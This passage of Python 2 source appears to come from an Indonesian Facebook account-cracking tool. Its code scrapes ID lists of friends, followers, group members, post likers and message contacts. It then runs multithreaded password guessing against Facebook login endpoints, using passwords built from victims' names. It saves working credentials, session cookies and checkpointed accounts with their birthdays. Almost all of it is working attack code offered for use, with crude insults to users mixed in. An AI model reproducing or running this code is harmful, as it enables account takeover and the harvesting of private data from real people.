print (" - kemudian klik %sCari di Halaman %s"%(O,H));jeda(2)
print (" - ketik %sEAAAA %sakan muncul acces token."%(O,H));jeda(2)
print (" - jika sudah jangan lupa di salin \n");jeda(2)
nanya = raw_input('%s%s%s Anda paham? %sy%s/%sn :%s '%(U,til,O,H,O,M,K))
if nanya in(""):
print ("%s%s saya bertanya wajib di jawab "%(M,til));jeda(2);masuk()
elif nanya in("y","Y"):
print ("\n%s%s selamat anda pintar :* "%(H,til));jeda(2);masuk()
elif nanya in("n","N"):
print ("\n%s%s anda sungguh tolol "%(M,til));jeda(2);os.system("xdg-open https://youtu.be/IG5QfdxRkeY");masuk()
elif rom in ('0', '00'):
exit('\n')
else:
print("%s%s wrong input "%(M,til));exit()
# MASUK COOKIE (KUEH KERING)
host = ('https://mbasic.facebook.com')
ua = ("NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+")
h = {'Host': 'mbasic.facebook.com', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent': ua, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
def __romz__():
if os.path.exists(".cok"):
if os.path.getsize(".cok") !=0:
return cvd(open('.cok').read().strip())
else:gen()
else:gen()
def gen(show=True):
if show==True:
#os.system("clear")
#banner()
print("\n%s%s%s Supaya bekerja masukan cookie facebook anda"%(U,til,O))
ck=raw_input("%s# %sCookie %s> %s"%(P,O,M,K))
if ck=="":gen(show=False)
try:
cks=cvd(ck)
if kueh(cks)==True:
open(".cok","w").write(ck);exit("%s%s login success, ketik: python2 bff-2.py "%(H,til))
else:print("%s%s login gagal."%(M,til));gen(show=True)
except Exception as e:
print("%s%s error : %s\n"%(M,til,e))
gen(show=False)
def kueh(cookies):
f=False
b=requests.get("https://mbasic.facebook.com/profile.php",headers={'origin': 'https://mbasic.facebook.com', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'accept-encoding': 'gzip, deflate', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'user-agent': ua, 'Host': ('').join(bs4.re.findall('://(.*?)$', 'https://mbasic.facebook.com')), 'referer': 'https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'content-type': 'application/x-www-form-urlencoded'},cookies=cookies).text
if "mbasic_logout_button" in b.lower():
f=True
if f==True:
return True
else:
exit("%s%s login gagal. "%(M,til))
def hdcok():
hosts = host
r = {'origin': hosts, 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'accept-encoding': 'gzip, deflate', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'user-agent': ua, 'Host': ('').join(bs4.re.findall('://(.*?)$', hosts)), 'referer': hosts + '/login/?next&ref=dbl&fl&refid=8', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'content-type': 'application/x-www-form-urlencoded'}
return r
def cvs(cookies): # convert cookie dict to string
result=[]
for i in enumerate(cookies.keys()):
if i[0]==len(cookies.keys())-1:result.append(i[1]+"="+cookies[i[1]])
else:result.append(i[1]+"="+cookies[i[1]]+"; ")
return "".join(result)
def cvd(cookies): # convert cookie dict to string
result={}
try:
for i in cookies.split(";"):
result.update({i.split("=")[0]:i.split("=")[1]})
return result
except:
for i in cookies.split("; "):
result.update({i.split("=")[0]:i.split("=")[1]})
return result
# DUMP PUBLIK
def publik(romz,headers=header):
try:
os.mkdir('dump')
except:pass
try:
print ("\n%s%s %sKetik '%sme%s' jika ingin dump daftar teman sendiri "%(U,til,O,H,O))
idt = raw_input('%s%s %sTarget id%s > %s'%(U,til,O,M,K))
#simpan = raw_input('%s%s%s Nama file%s > %s'%(U,til,O,M,K))
gas = requests.get('https://graph.facebook.com/%s?access_token=%s'%(idt,romz))
nm = json.loads(gas.text)
file = ('dump/'+nm['first_name']+'.json').replace(' ', '_')
bff = open(file, 'w')
r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(5001)&access_token=%s'%(idt,romz))
z = json.loads(r.text)
for a in z['friends']['data']:
id.append(a['id'] + '<=>' + a['name'])
bff.write(a['id'] + '<=>' + a['name'] + '\n')
print '\r%s%s%s mengumpulkan id%s >%s %s ' % (U,til,O,M,H,str(len(id))),
sys.stdout.flush();jeda(0.0050)
bff.close()
print ('\n\n%s%s Succes dump id dari %s'%(H,til,nm['name']))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,file))
raw_input('\n%s%s%s Kembali '%(U,til,O))
menu()
except Exception as e:
exit('\n%s%s Failed dump id'%(M,til))
# DUMP FOLLOWERS
def followers(romz,headers=header):
try:
os.mkdir('dump')
except:pass
try:
print ("\n%s%s %sKetik '%sme%s' jika ingin dump followers sendiri "%(U,til,O,H,O))
idt = raw_input('%s%s %sTarget id%s > %s'%(U,til,O,M,K))
batas = raw_input('%s%s %sMaximal id%s > %s'%(U,til,O,M,K))
#simpan = raw_input('%s%s%s Nama file%s > %s'%(U,til,O,M,K))
gas = requests.get('https://graph.facebook.com/%s?access_token=%s'%(idt,romz))
nm = json.loads(gas.text)
file = ('dump/'+nm['first_name']+'.json').replace(' ', '_')
bff = open(file, 'w')
r = requests.get('https://graph.facebook.com/%s/subscribers?limit=%s&access_token=%s'%(idt,batas,romz))
z = json.loads(r.text)
for a in z['data']:
id.append(a['id'] + '<=>' + a['name'])
bff.write(a['id'] + '<=>' + a['name'] + '\n')
print ('\r%s%s%s mengumpulkan id%s >%s %s ' % (U,til,O,M,H,str(len(id)))),
sys.stdout.flush();jeda(0.0050)
bff.close()
print ('\n\n%s%s Succes dump followers dari %s '%(H,til,nm["name"]))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,file))
raw_input('\n%s%s%s Kembali '%(U,til,O))
menu()
except Exception as e:
exit('\n%s%s Failed dump id'%(M,til))
# DUMP POSTINGAN
def postingan(romz,headers=header):
try:
os.mkdir('dump')
except:pass
try:
print ("\n%s%s %sPerlu di ingat postingan harus bersifat publik "%(U,til,O))
idt = raw_input('%s%s %sId post%s > %s'%(U,til,O,M,K))
simpan = raw_input('%s%s%s Nama file%s > %s'%(U,til,O,M,K))
r = requests.get('https://graph.facebook.com/%s/likes?limit=999999&access_token=%s'%(idt,romz))
id = []
z = json.loads(r.text)
file = ('dump/' + simpan + '.json').replace(' ', '_')
bff = open(file, 'w')
for a in z['data']:
id.append(a['id'] + '<=>' + a['name'])
bff.write(a['id'] + '<=>' + a['name'] + '\n')
print '\r%s%s%s mengumpulkan id%s >%s %s ' % (U,til,O,M,H,str(len(id))),
sys.stdout.flush();jeda(0.0050)
bff.close()
print ('\n\n%s%s Succes dump id postingan '%(H,til))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,file))
raw_input('\n%s%s%s Kembali '%(U,til,O))
menu()
except Exception as e:
exit('\n%s%s Failed dump id'%(M,til))
# DUMP GROUP
class group:
def __init__(self, cookies):
self.glist=[]
self.cookies=cookies
self.manual()
exit()
def manual(self):
print("\n%s%s%s Perlu di ingat group harus bersifat publik atau wajib join group"%(U,til,O))
id=raw_input("%s%s%s Id groups%s > %s"%(U,til,O,M,K))
if id in(""):
self.manual()
else:
r=bs4.BeautifulSoup(requests.get("https://mbasic.facebook.com/groups/"+id,headers=hdcok(),cookies=self.cookies).text,"html.parser")
if "konten tidak" in r.find("title").text.lower():
exit("%s%s input id grup yg valid goblok, id error, atau lu belom jooin di grup"%(M,til))
else:
self.listed={"id":id,"name":r.find("title").text}
self.f()
print("%s%s%s Nama grup%s > %s%s.."%(U,til,O,M,H,self.listed.get("name")[0:20]))
self.dumps("https://mbasic.facebook.com/groups/"+id)
def f(self):
self.fl=raw_input('%s%s%s Nama file %s> %s'%(U,til,O,M,K)).replace(" ","_")
if self.fl=='':self.f()
open(self.fl,"w").close()
def dumps(self, url):
r=bs4.BeautifulSoup(requests.get(url,cookies=self.cookies,headers=hdcok()).text,"html.parser")
print("\r%s%s%s mengumpulkan id %s> %s%s \x1b[1;97m- mohon tunggu\r"%(U,til,O,M,H,str(len(open(self.fl).read().splitlines()))))
sys.stdout.flush();jeda(0.0050)
for i in r.find_all("h3"):
try:
if len(bs4.re.findall("\/",i.find("a",href=True).get("href")))==1:
ogeh=i.find("a",href=True)
if "profile.php" in ogeh.get("href"):
a="".join(bs4.re.findall("profile\.php\?id=(.*?)&",ogeh.get("href")))
if len(a)==0:continue
elif a in open(self.fl).read():
continue
else:
open(self.fl,"a+").write("%s<=>%s\n"%(a,ogeh.text))
continue
else:
a="".join(bs4.re.findall("/(.*?)\?",ogeh.get("href")))
if len(a)==0:continue
elif a in open(self.fl).read():
continue
else:
open(self.fl,"a+").write("%s<=>%s\n"%(a,ogeh.text))
except:continue
for i in r.find_all("a",href=True):
if "Lihat Postingan Lainnya" in i.text:
while True:
try:
self.dumps("https://mbasic.facebook.com/"+i.get("href"))
break
except Exception as e:
print("\r\x1b[1;91m•%s, retrying..."%e);continue
print ('\n\n%s%s Succes dump id member group '%(H,til));print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,self.fl));raw_input("\n%s%s%s kembali"%(U,til,O));menu()
def cek(arg):
if os.path.exists(".cok"):
if os.path.getsize(".cok") !=0:
return True
else:return False
else:return False
# DUMP PENCARIAN NAMA
def dumpfl():
cvds = None
cookie = None
new = None
if cek(1) == False:
try:
cookie = raw_input("\n%s%s%s Supaya bekerja masukan cookie facebook anda\n%s# %sCookie%s > %s"%(U,til,O,P,O,M,K))
cvds = cvd(cookie)
new = True
except:
print("\x1b[1;91m• invalid cookie");dumpfl()
else:
cvds = cvd(open('.cok').read().strip())
r = requests.get('https://mbasic.facebook.com/profile.php', cookies=cvds, headers=hdcok()).text
if len(bs4.re.findall('logout', r)) != 0:
if lang(cvds) != True:
exit("%s%s gagal saat mendeteksi bahasa."%(M,til))
#print("\n%s%s%s Login sebagai%s [ %s%s..]"%(U,til,O,M,H,bs4.BeautifulSoup(r,"html.parser").find("title").text[0:10]))
if new == True:
open('.cok', 'w').write(cookie)
sim=raw_input("\n%s%s%s Nama file %s>%s "%(U,til,O,M,K)).replace(" ","_")
print ("%s%s%s Example nama orang %s[ %sRomi Ganteng %s]"%(U,til,O,P,H,P))
s=raw_input("%s%s%s Sett nama %s> %s"%(U,til,O,M,K))
if s in("romi","Romi","ROMI","Romi Afrizal","Romi afrizal","ROMI AFRIZAL","romi afrizal"):
print("\n%s%s anak anjing mau crack pake nama gw "%(M,til));exit()
elif s in("Romi Ganteng","Romi ganteng","ROMI GANTENG","romi ganteng"):
print ("\n%s%s memang ganteng dong abang Romi"%(H,til));exit()
namah(sim,cvds,"https://mbasic.facebook.com/search/people/?q="+s)
else:
try:
os.remove('.cok')
except:
pass
print '\x1b[1;91m• login fail!'
dumpfl()
return
def namah(sim,r,b):
open(sim,"a+")
b=bs4.BeautifulSoup(requests.get(b, cookies=r,headers=hdcok()).text,"html.parser")
for i in b.find_all("a",href=True):
#clear()
#banner()
print("\r%s%s%s mengumpulkan id %s> %s%s \x1b[1;97m- mohon tunggu\r"%(U,til,O,M,H,str(len(open(sim).read().splitlines())))),;sys.stdout.flush()
if "<img alt=" in str(i):
if "home.php" in str(i["href"]):
continue
else:
g=str(i["href"])
if "profile.php" in g:
name=i.find("img").get("alt").replace(", profile picture","")
d=bs4.re.findall("/profile\.php\?id=(.*?)&",g)
if len (d) !=0:
pk="".join(d)
if pk in open(sim).read():
pass
else:
open(sim,"a+").write("%s<=>%s\n"%(pk,name))
else:
d=bs4.re.findall("/(.*?)\?",g)
name=i.find("img").get("alt").replace(", profile picture","")
if len(d) !=0:
pk="".join(d)
if pk in open(sim).read():
pass
else:
open(sim,"a+").write("%s<=>%s\n"%(pk,name))
if "Lihat Hasil Selanjutnya" in i.text:
namah(sim,r,i["href"])
print ('\n\n%s%s Succes dump id pencarian nama '%(H,til));print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,sim));raw_input("\n%s%s%s kembali"%(U,til,O));menu()
# DUMP PESAN
class pesan:
def __init__(self, cookies):
self.cookies = cookies
#basecookie()
#clear()
self.f = raw_input('\n%s%s%s Nama file%s >%s '%(U,til,O,M,K)).replace(' ', '_')
if self.f == '':
pesan(cookies)
open(self.f, 'w').close()
self.dump('https://mbasic.facebook.com/messages')
def dump(self,url):
open(self.f, 'a+')
bs = bs4.BeautifulSoup(requests.get(url, headers=hdcok(), cookies=self.cookies).text, 'html.parser')
print ("\r%s%s%s mengumpulkan id %s> %s%s \x1b[1;97m- mohon tunggu\r"%(U,til,O,M,H,str(len(open(self.f).read().splitlines()))));sys.stdout.flush();jeda(0.0050)
for i in bs.find_all('a', href=True):
if '/messages/read' in i.get('href'):
f = bs4.re.findall('cid\\.c\\.(.*?)%3A(.*?)&', i.get('href'))
try:
for ip in list(f.pop()):
if self.cookies.get(' c_user') in ip:
continue
else:
if 'pengguna facebook' in i.text.lower():
continue
open(self.f, 'a+').write('%s<=>%s\n' % (ip, i.text))
except Exception as e:
continue
if 'Lihat Pesan Sebelumnya' in i.text:
self.dump('https://mbasic.facebook.com/' + i.get('href'))
print ('\n%s%s Succes dump id pesan mesengger '%(H,til))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,self.f))
raw_input("\n%s%s%s kembali"%(U,til,O));menu()
# GANTI USER AGENT
def useragent():
print ("\n%s%s%s 01 %sGanti user agents "%(U,til,P,O))
print ("%s%s%s 02 %sCek user agents "%(U,til,P,O))
print ("%s%s%s 00 %sKembali "%(U,til,M,O))
uas()
def uas():
u = raw_input('\n%s#%s Pilih%s >%s '%(P,O,M,K))
if u == '':
print '%s%s wrong input'%(M,til);jeda(2);uas()
elif u in("1","01"):
print ("%s%s%s Ketik %sMy user agent%s di browser google chrome\n%s%s%s untuk gunakan user agent anda sendiri"%(U,til,O,H,O,U,til,O))
print ("%s%s%s Ketik %sdefault%s untuk gunakan user agent bawaan tools"%(U,til,O,H,O))
try:
ua = raw_input("%s%s%s Enter user agent %s: %s"%(U,til,O,M,K))
if ua in(""):
print ("%s%s isi yang benar "%(M,til));jeda(2);menu()
elif ua in("my user agent","My User Agent","MY USER AGENT","My user agent"):
jalan("%s%s%s Anda akan di arahkan ke browser "%(U,til,O));jeda(2)
os.system("am start https://www.google.com/search?q=My+user+agent>/dev/null");jeda(2);useragent()
elif ua in("default","Default","DEFAULT"):
ua_ = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
open("data/ua.txt","w").write(ua_)
print ("\n%s%s Using the built-in user agent"%(H,til));jeda(2);menu()
open("data/ua.txt","w").write(ua);jeda(2)
print ("\n%s%s Successfully changed user agent"%(H,til));jeda(2);menu()
except KeyboardInterrupt:
exit ("\x1b[1;91m• Error ")
elif u in("2","02"):
try:
ua_ = open('data/ua.txt', 'r').read();jeda(2);print ("%s%s%s user agent anda : %s%s"%(U,til,O,H,ua_));jeda(2);raw_input("%s%s%s kembali "%(U,til,O));menu()
except IOError:
ua_ = '%s-'%(M)
elif u in("0","00"):
menu()
else:
print '%s%s wrong input'%(M,til);jeda(2);uas()
# MULAI CRACK
class ngentod:
def __init__(self):
self.id = []
def askk(self):
try:
self.apk = raw_input('\n%s%s%s file dump %s> %s'%(U,til,O,M,K))
self.id = open(self.apk).read().splitlines()
print '%s%s%s jumlah Id%s > %s%s' %(U,til,O,M,H,len(self.id))
except:
print ('\n%s%s file dump : %s%s%s tidak ada'%(M,til,K,self.apk,M));jeda(2);print('%s%s lu harus dump id dlu, pilih antara menu no 1-6 '%(M,til));jeda(3);menu()
rom = raw_input('%s%s%s gunakan password manual? y/t%s > %s'%(U,til,O,M,K))
if rom in ('Y', 'y'):
print ('\n%s%s%s contoh%s >%s sayang%s,%spengen%s,%sngentot'%(U,til,O,M,O,M,O,M,O))
while True:
pwek = raw_input('%s%s%s password %s> %s'%(U,til,O,M,K))
if pwek == '':
print("%s%s Jangan kosong"%(M,til))
elif len(pwek)<=5:
print ('%s%s sandi minimal 6 karakter'%(M,til))
else:
def xxh(xxnx=None):
skm = raw_input('\n%s#%s Pilih %s> %s '%(P,O,M,K))
if skm in(""):
print '%s%s isi yg benar sayang'%(M,til);self.xxh()
elif skm in("1","01"):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
ah = uh.split('<=>')[0]
njir.submit(self.api, ah, xxnx)
except: pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif skm in("2","02"):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
ah = uh.split('<=>')[0]
njir.submit(self.mbasic, ah, xxnx)
except: pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif skm in("3","03"):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
ah = uh.split('<=>')[0]
njir.submit(self.mobile, ah, xxnx)
except: pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
else:
print '\n%s%s Isi yg benar'%(M,til);jeda(2);xxh()
print '\n%s%s%s [ pilih methode crack ]\n'%(U,til,O)
print '%s%s%s 01%s methode %sb-api%s (fast crack)'%(U,til,P,O,M,O)
print '%s%s%s 02%s methode %smbasic%s (slow crack)'%(U,til,P,O,P,O)
print '%s%s%s 03%s methode %smobile%s (very slow crack)'%(U,til,P,O,H,O)
xxh(pwek.split(','))
break
elif rom in ('T', 't'):
print '\n%s%s%s [ pilih methode crack ]\n'%(U,til,O)
print '%s%s%s 01%s methode %sb-api%s (fast crack)'%(U,til,P,O,M,O)
print '%s%s%s 02%s methode %smbasic%s (slow crack)'%(U,til,P,O,P,O)
print '%s%s%s 03%s methode %smobile%s (very slow crack)'%(U,til,P,O,H,O)
self.sung()
else:
print '\n%s%s Isi yg benar'%(M,til);jeda(2);menu()
return
def api(self, user, xxh):
global ok,cp,loop
print('\r%s%s%s [crack] %s/%s [OK-:%s]-[CP-:%s] '%(U,til,O,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in xxh:
pw = pw.lower()
try: os.mkdir('hasil')
except: pass
try:
ua = open('data/ua.txt', 'r').read()
except (KeyError, IOError):
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
response = requests.get("https://b-api.facebook.com/method/auth.login?format=json&email="+user+"&password="+pw+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers_)
if response.status_code != 200:
print ("\r\033[0;91m• IP terblokir. hidupkan mode pesawat 2 detik"),
sys.stdout.flush()
loop +=1
api(self, user, xxh)
if 'session_key' in response.text and 'EAAA' in response.text:
print ('\r %s*--> %s ◊ %s ◊ %s ' % (H,user,pw,response.json()['access_token']))
wrt = ' *--> %s ◊ %s ◊ %s ' % (user,pw,response.json()['access_token'])
ok.append(wrt)
open('hasil/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif 'www.facebook.com' in response.json()['error_msg']:
try:
romz = open('data/token.txt').read()
lahir = json.loads(requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,romz)).text)["birthday"]
month, day, year = lahir.split('/')
month = bulan1[month]
print '\r %s*--> %s ◊ %s ◊ %s %s %s ' % (K,user,pw,day,month,year)
wrt = ' *--> %s ◊ %s ◊ %s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
lahir = ''
except:
pass
print '\r %s*--> %s ◊ %s ' % (K,user,pw)
wrt = ' *--> %s ◊ %s' % (user,pw)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def mbasic(self, user, xxh):
global ok,cp,loop
print('\r%s%s%s [crack] %s/%s [OK-:%s]-[CP-:%s] '%(U,til,O,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in xxh:
pw = pw.lower()
try: os.mkdir('hasil')
except: pass
try:
ua = open('data/ua.txt', 'r').read()
except (KeyError, IOError):
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
ses = requests.Session()
ses.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://mbasic.facebook.com")
b = ses.post("https://mbasic.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print ('\r %s*--> %s ◊ %s ◊ %s ' % (H,user,pw,kuki))
wrt = (' *--> %s ◊ %s ◊ %s' % (user,pw,kuki))
ok.append(wrt)
open('hasil/OK-%s-%s-%s.txt'% (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
romz = open('data/token.txt').read()
lahir = json.loads(requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,romz)).text)["birthday"]
month, day, year = lahir.split('/')
month = bulan1[month]
print ('\r %s*--> %s ◊ %s ◊ %s %s %s ' % (K,user,pw,day,month,year))
wrt = (' *--> %s ◊ %s ◊ %s %s %s' % (user,pw,day,month,year))
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
lahir = ''
except:
pass
print ('\r %s*--> %s ◊ %s ' % (K,user,pw))
wrt = (' *--> %s ◊ %s' % (user,pw))
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def mobile(self, user, xxh):
global ok,cp,loop
print('\r%s%s%s [crack] %s/%s [OK-:%s]-[CP-:%s] '%(U,til,O,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in xxh:
pw = pw.lower()
try: os.mkdir('hasil')
except: pass
try:
ua = open('data/ua.txt', 'r').read()
except (KeyError, IOError):
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com")
b = bs4.BeautifulSoup(p.text, 'html.parser')
dtg = ('').join(bs4.re.findall('dtsg":\\{"token":"(.*?)"', p.text))
data = {}
for mi in b('input'):
if mi.get('value') is None:
if mi.get('name') == 'email':
data.update({"email":user})
elif mi.get("name")=="pass":
data.update({"pass":pw})
else:
data.update({mi.get('name'): ''})
else:
data.update({mi.get('name'): mi.get('value')})
data.update({'fb_dtsg': dtg, 'm_sess': '', '__user': '0', '__req': 'd',
'__csr': '', '__a': '', '__dyn': '', 'encpass': ''})
ses.headers.update({'referer': 'https://m.facebook.com/login/?next&ref=dbl&fl&refid=8'})
po = ses.post('https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100', data=data).text
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print '\r %s*--> %s ◊ %s ◊ %s ' % (H,user,pw,kuki)
wrt = ' *--> %s ◊ %s ◊ %s' % (user,pw,kuki)
ok.append(wrt)
open('hasil/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
romz = open('data/token.txt').read()
lahir = json.loads(requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,romz)).text)["birthday"]
month, day, year = lahir.split('/')
month = bulan1[month]
print '\r %s*--> %s ◊ %s ◊ %s %s %s ' % (K,user,pw,day,month,year)
wrt = ' *--> %s ◊ %s ◊ %s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
lahir = ''
except:
pass
print '\r %s*--> %s ◊ %s ' % (K,user,pw)
wrt = ' *--> %s ◊ %s' % (user,pw)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def sung(self):
ii = raw_input('\n%s#%s Pilih %s>%s '%(P,O,M,K))
if ii == '':
print '\n%s%s isi yang benar '%(M,til);self.sung()
elif ii in ('1', '01'):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
uid, name = uh.split('<=>')
i = name.split(' ')
if len(i) == 3 or len(i) == 4 or len(i) == 5 or len(i) == 6:
pwx = [name, i[0]+"123", i[0]+"12345"]
else:
pwx = [name, i[0]+"123", i[0]+"12345"]
njir.submit(self.api, uid, pwx)
except:
pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif ii in ('2', '02'):
